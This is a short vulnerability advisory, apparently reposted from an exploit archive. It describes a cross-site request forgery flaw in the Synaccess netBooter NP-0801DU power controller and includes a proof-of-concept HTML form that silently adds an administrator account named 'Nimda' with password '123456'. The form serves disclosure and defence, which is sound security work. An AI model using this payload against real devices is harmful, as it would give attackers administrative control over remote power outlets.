Synaccess netBooter NP-0801DU 7.4 Cross Site Request Forgery

Synaccess netBooter NP-0801DU version 7.4 suffers from a cross site request forgery vulnerability.

MD5 | c58aeb7ef6b68b80d63bcfe2db7d1b15


Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit

Vendor: Synaccess Networks Inc.
Product web page:
Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)

Summary: netBooter NP-0801DU and NP-0801DUH PDUs provide secured
remote power source management of 8 independent outlets. Includes
true RMS AC current reading and environment temperature monitoring
via TCP/IP networks or local direct connection.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certai
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Synaccess server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5501
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="add1" value="Nimda" />
<input type="hidden" name="add2" value="123456" />
<input type="hidden" name="add3" value="123456" />
<input type="hidden" name="adm0" value="1" />
<input type="submit" value="Gou" />

Related Posts